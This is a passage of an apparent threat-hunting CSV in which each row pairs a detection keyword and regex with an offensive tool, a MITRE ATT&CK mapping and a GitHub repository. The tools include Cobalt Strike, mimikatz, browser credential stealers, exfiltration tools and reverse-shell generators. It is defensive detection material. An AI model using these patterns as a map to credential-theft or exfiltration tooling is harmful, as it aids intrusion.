- TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*MeteTool*",".{0,1000}MeteTool.{0,1000}","offensive_tool_keyword","MeteTool","Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.","T1059.003 - T1064 - T1135 - T1059.007","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/S-S-X/metatool","1","0","N/A","N/A","1","2","1","2024-03-19T17:29:49Z","2020-05-09T19:09:17Z" "*methodHash*528465795*",".{0,1000}methodHash.{0,1000}528465795.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","199","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*methods::dns::dns_exfiltrator*",".{0,1000}methods\:\:dns\:\:dns_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*methods::https::https_exfiltrator*",".{0,1000}methods\:\:https\:\:https_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*methods::icmp::icmp_exfiltrator*",".{0,1000}methods\:\:icmp\:\:icmp_exfiltrator.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*Metro-Holografix/CSExec*",".{0,1000}Metro\-Holografix\/CSExec.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Metro-Holografix/Dinjector*",".{0,1000}Metro\-Holografix\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*metsrv.dll*",".{0,1000}metsrv\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*metsvc-server.exe*",".{0,1000}metsvc\-server\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","service file name","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*metterpreter*",".{0,1000}metterpreter.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-payloads","1","1","N/A","10","10","1659","656","2024-04-18T10:56:49Z","2014-04-03T21:18:24Z" "*MFASweep.ps1*",".{0,1000}MFASweep\.ps1.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*mfgccjchihfkkindfppnaooecgfneiii*",".{0,1000}mfgccjchihfkkindfppnaooecgfneiii.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*mgeeky/PackMyPayload*",".{0,1000}mgeeky\/PackMyPayload.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*mgeeky/RedWarden*",".{0,1000}mgeeky\/RedWarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*mgffkfbidihjpoaomajlbgchddlicgpn*",".{0,1000}mgffkfbidihjpoaomajlbgchddlicgpn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*mhaskar/DNSStager*",".{0,1000}mhaskar\/DNSStager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","1","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*mhaskar/Octopus*",".{0,1000}mhaskar\/Octopus.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*mhuzaifi0604/spellbound*",".{0,1000}mhuzaifi0604\/spellbound.{0,1000}","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","1","N/A","10","10","45","5","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "*mhydeath.exe*",".{0,1000}mhydeath\.exe.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*mhydeath-master*",".{0,1000}mhydeath\-master.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*micahvandeusen/gMSADumper*",".{0,1000}micahvandeusen\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "*Michael Zhmaylo (github.com/*",".{0,1000}Michael\sZhmaylo\s\(github\.com\/.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*micr0 shell.py*",".{0,1000}micr0\sshell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*micr0_shell-main*",".{0,1000}micr0_shell\-main.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*micr0shell.py *",".{0,1000}micr0shell\.py\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*microbrownys.strangled.net*",".{0,1000}microbrownys\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*MicroBurst.psm1*",".{0,1000}MicroBurst\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-Az.psm1*",".{0,1000}MicroBurst\-Az\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-AzureAD*",".{0,1000}MicroBurst\-AzureAD.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-AzureREST*",".{0,1000}MicroBurst\-AzureREST.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-AzureRM*",".{0,1000}MicroBurst\-AzureRM.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-master*",".{0,1000}MicroBurst\-master.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-Misc.psm1*",".{0,1000}MicroBurst\-Misc\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*MicroBurst-MSOL*",".{0,1000}MicroBurst\-MSOL.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*microchsse.strangled.net*",".{0,1000}microchsse\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*microlilics.crabdance.com*",".{0,1000}microlilics\.crabdance\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*micronaoko.jumpingcrab.com*",".{0,1000}micronaoko\.jumpingcrab\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*microplants.strangled.net*",".{0,1000}microplants\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Microsoft\Windows\Recent\PrivescCheck*",".{0,1000}Microsoft\\Windows\\Recent\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*microsoft-edge/cookies.txt*",".{0,1000}microsoft\-edge\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge/credit_cards.txt*",".{0,1000}microsoft\-edge\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge/history.txt*",".{0,1000}microsoft\-edge\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge/login_data.txt*",".{0,1000}microsoft\-edge\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\cookies.txt*",".{0,1000}microsoft\-edge\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\credit_cards.txt*",".{0,1000}microsoft\-edge\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\history.txt*",".{0,1000}microsoft\-edge\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsoft-edge\login_data.txt*",".{0,1000}microsoft\-edge\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*microsploit.git*",".{0,1000}microsploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","435","135","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" "*Midl2Bytes.exe*",".{0,1000}Midl2Bytes\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","5","408","52","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" "*--mifi-username * --mifi-password * --number +*",".{0,1000}\-\-mifi\-username\s.{0,1000}\s\-\-mifi\-password\s.{0,1000}\s\-\-number\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*MIGkAgEBBDBido1KtKSwQah/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II*",".{0,1000}MIGkAgEBBDBido1KtKSwQah\/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*",".{0,1000}MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*",".{0,1000}MIIEoQIBAAKCAQEArJqP\/6XFBa88x\/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*",".{0,1000}MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*",".{0,1000}MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe*",".{0,1000}MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*mimi32.exe *",".{0,1000}mimi32\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*mimi64.exe *",".{0,1000}mimi64\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Mimi-Command *",".{0,1000}Mimi\-Command\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - 